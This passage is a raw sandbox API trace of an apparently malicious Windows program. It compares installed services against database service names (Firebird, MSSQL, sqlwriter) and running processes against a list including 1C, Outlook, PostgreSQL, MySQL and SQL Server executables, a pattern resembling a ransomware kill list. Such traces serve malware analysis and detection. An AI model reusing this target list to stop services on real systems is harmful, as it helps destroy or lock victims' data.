lpString2="CscService") returned 1 [0059.374] lstrlenW (lpString="DcomLaunch") returned 10 [0059.374] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0059.374] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0059.374] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0059.375] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0059.375] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0059.376] lstrlenW (lpString="Dhcp") returned 4 [0059.376] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0059.376] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0059.376] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0059.377] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0059.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0059.377] lstrlenW (lpString="Dnscache") returned 8 [0059.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0059.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0059.378] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0059.378] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0059.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0059.379] lstrlenW (lpString="DPS") returned 3 [0059.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0059.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0059.380] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0059.380] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0059.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0059.381] lstrlenW (lpString="eventlog") returned 8 [0059.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0059.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0059.382] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0059.382] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0059.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0059.383] lstrlenW (lpString="EventSystem") returned 11 [0059.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0059.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0059.385] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0059.385] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0059.386] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0059.386] lstrlenW (lpString="gpsvc") returned 5 [0059.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0059.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0059.388] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0059.388] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0059.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0059.389] lstrlenW (lpString="iphlpsvc") returned 8 [0059.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0059.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0059.390] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0059.390] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0059.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0059.390] lstrlenW (lpString="LanmanServer") returned 12 [0059.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0059.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0059.392] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0059.392] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0059.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0059.392] lstrlenW (lpString="LanmanWorkstation") returned 17 [0059.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0059.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0059.394] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0059.394] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0059.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0059.395] lstrlenW (lpString="lmhosts") returned 7 [0059.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0059.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0059.396] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0059.398] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0059.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0059.399] lstrlenW (lpString="MMCSS") returned 5 [0059.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0059.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0059.399] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0059.400] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0059.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0059.401] lstrlenW (lpString="MpsSvc") returned 6 [0059.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0059.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0059.403] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0059.403] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0059.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0059.403] lstrlenW (lpString="Netman") returned 6 [0059.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0059.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0059.405] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0059.405] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0059.405] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0059.405] lstrlenW (lpString="netprofm") returned 8 [0059.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0059.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0059.406] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0059.406] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0059.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0059.407] lstrlenW (lpString="NlaSvc") returned 6 [0059.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0059.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0059.409] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0059.409] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0059.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0059.411] lstrlenW (lpString="nsi") returned 3 [0059.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0059.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0059.413] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0059.413] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0059.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0059.413] lstrlenW (lpString="PcaSvc") returned 6 [0059.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0059.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0059.415] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0059.415] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0059.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0059.416] lstrlenW (lpString="PlugPlay") returned 8 [0059.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0059.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0059.416] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0059.419] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0059.420] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0059.420] lstrlenW (lpString="Power") returned 5 [0059.421] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0059.421] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0059.421] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0059.421] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0059.421] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0059.422] lstrlenW (lpString="ProfSvc") returned 7 [0059.422] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0059.422] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0059.423] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0059.424] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0059.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0059.425] lstrlenW (lpString="RpcEptMapper") returned 12 [0059.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0059.426] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0059.427] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0059.428] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0059.428] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0059.428] lstrlenW (lpString="RpcSs") returned 5 [0059.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0059.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0059.430] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0059.430] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0059.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0059.431] lstrlenW (lpString="SamSs") returned 5 [0059.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0059.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0059.431] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0059.432] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0059.433] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0059.433] lstrlenW (lpString="Schedule") returned 8 [0059.434] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0059.434] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0059.434] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0059.435] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0059.436] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0059.437] lstrlenW (lpString="SENS") returned 4 [0059.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0059.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0059.439] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0059.439] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0059.439] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0059.440] lstrlenW (lpString="ShellHWDetection") returned 16 [0059.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0059.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0059.441] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0059.441] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0059.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0059.442] lstrlenW (lpString="Spooler") returned 7 [0059.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0059.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0059.443] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0059.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0059.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0059.444] lstrlenW (lpString="swprv") returned 5 [0059.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0059.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0059.471] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0059.471] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0059.472] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0059.472] lstrlenW (lpString="SysMain") returned 7 [0059.472] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0059.472] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0059.472] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0059.472] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0059.472] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0059.472] lstrlenW (lpString="Themes") returned 6 [0059.472] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0059.472] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0059.472] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0059.472] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0059.472] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0059.472] lstrlenW (lpString="TrkWks") returned 6 [0059.472] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0059.472] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0059.472] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0059.472] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0059.473] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0059.474] lstrlenW (lpString="UxSms") returned 5 [0059.474] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0059.474] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0059.474] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0059.474] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0059.475] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0059.475] lstrlenW (lpString="VSS") returned 3 [0059.475] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0059.475] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0059.475] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0059.475] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0059.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0059.476] lstrlenW (lpString="WdiServiceHost") returned 14 [0059.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0059.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0059.476] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0059.476] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0059.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0059.476] lstrlenW (lpString="WdiSystemHost") returned 13 [0059.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0059.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0059.476] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0059.476] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0059.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0059.476] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0059.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0059.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0059.476] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0059.476] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0059.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0059.476] lstrlenW (lpString="Winmgmt") returned 7 [0059.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0059.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0059.476] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0059.476] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0059.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0059.476] lstrlenW (lpString="WPDBusEnum") returned 10 [0059.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0059.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0059.476] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0059.476] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0059.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0059.477] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0059.477] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0059.479] Process32FirstW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0059.479] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0059.482] lstrlenW (lpString="System") returned 6 [0059.483] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0059.483] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0059.483] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0059.483] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0059.483] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0059.483] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0059.483] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0059.483] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0059.483] lstrlenW (lpString="smss.exe") returned 8 [0059.483] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0059.483] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0059.483] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0059.483] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0059.484] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0059.484] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0059.484] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0059.484] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0059.488] lstrlenW (lpString="csrss.exe") returned 9 [0059.488] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0059.489] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0059.489] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0059.490] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0059.490] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0059.490] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0059.490] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0059.490] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0059.492] lstrlenW (lpString="wininit.exe") returned 11 [0059.492] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0059.492] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0059.493] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0059.494] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.059] lstrlenW (lpString="csrss.exe") returned 9 [0060.059] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.060] lstrlenW (lpString="winlogon.exe") returned 12 [0060.060] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.061] lstrlenW (lpString="services.exe") returned 12 [0060.061] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.061] lstrlenW (lpString="lsass.exe") returned 9 [0060.061] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.062] lstrlenW (lpString="lsm.exe") returned 7 [0060.062] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.063] lstrlenW (lpString="svchost.exe") returned 11 [0060.063] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.063] lstrlenW (lpString="svchost.exe") returned 11 [0060.063] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.064] lstrlenW (lpString="svchost.exe") returned 11 [0060.064] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.065] lstrlenW (lpString="svchost.exe") returned 11 [0060.065] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.065] lstrlenW (lpString="svchost.exe") returned 11 [0060.066] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.066] lstrlenW (lpString="audiodg.exe") returned 11 [0060.066] Process32NextW (in: hSnapshot=0x240, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.067] lstrlenW 